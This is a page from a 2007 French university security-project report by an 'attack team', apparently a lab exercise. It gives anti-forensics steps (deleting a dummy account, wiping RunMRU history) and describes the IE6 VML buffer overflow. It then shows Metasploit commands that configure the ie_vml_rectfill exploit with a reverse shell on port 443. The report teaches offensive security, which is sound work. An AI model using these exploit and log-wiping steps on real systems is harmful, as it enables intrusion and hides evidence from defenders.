29.01.2014 Views

Objet du rapport / réunion - inetdoc.net

Objet du rapport / réunion - inetdoc.net

Objet du rapport / réunion - inetdoc.net

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

IUP STRI – M2 2007<br />

Projet Sécurité – Equipe attaque G1<br />

●<br />

●<br />

Supprimer le compte bidon si il existe<br />

Nettoyer l’historique de la commande exécuter<br />

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMR<br />

U<br />

●<br />

Effacer les lignes intéressantes<br />

Exploit sur faille VML de IE<br />

La faille<br />

Description Technique<br />

Une vulnérabilité a été identifiée dans Microsoft Inter<strong>net</strong> Explorer, elle pourrait être exploitée<br />

par des attaquants distants afin de causer un déni de service ou afin de compromettre un<br />

système vulnérable. Ce problème résulte d'une erreur de type buffer overflow présente au<br />

niveau <strong>du</strong> traitement d'un document Vector Markup Language (VML) contenant un tag "rect"<br />

avec un attribut "fill" excessivement long, ce qui pourrait être exploité par des attaquants afin<br />

d'altérer le fonctionnement d'un navigateur vulnérable ou afin d'exécuter des commandes<br />

arbitraires en incitant un utilisateur à visiter une page web spécialement conçue.<br />

Versions Vulnérables<br />

Voici les versions vulnérables qui nous concernent :<br />

Microsoft Inter<strong>net</strong> Explorer 6 SP1 sous Microsoft Windows XP Service Pack 1<br />

Microsoft Inter<strong>net</strong> Explorer 6 pour Microsoft Windows XP Service Pack 2<br />

Microsoft Inter<strong>net</strong> Explorer 6 pour Microsoft Windows Server 2003<br />

Microsoft Inter<strong>net</strong> Explorer 6 pour Microsoft Windows Server 2003 Service Pack 1<br />

Configuration de l’exploit<br />

Il y a de grandes chances que les utilisateurs aient le droit de faire de l’HTTP et de l’HTTPS.<br />

msf ie_vml_rectfill(win32_reverse) > set HTTPHOST 172.16.48.14<br />

HTTPHOST -> 172.16.48.14<br />

msf ie_vml_rectfill(win32_reverse) > set HTTPPORT 80<br />

HTTPPORT -> 80<br />

msf ie_vml_rectfill(win32_reverse) > set LHOST 172.16.48.14<br />

LHOST -> 172.16.48.14<br />

msf ie_vml_rectfill(win32_reverse) > set LPORT 443<br />

LPORT -> 443<br />

Quelques tests avant l’attaque<br />

Afin de vérifier le fonctionnement, nous avons testé en local si l’exploit fonctionne<br />

correctement :<br />

msf ie_vml_rectfill(win32_reverse) > exploit<br />

[*] Starting Reverse Handler.<br />

. Copyright (c) 2007 – GNU Free Documentation licence ­ Équipe Attaque G1 – M2 STRI 50

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!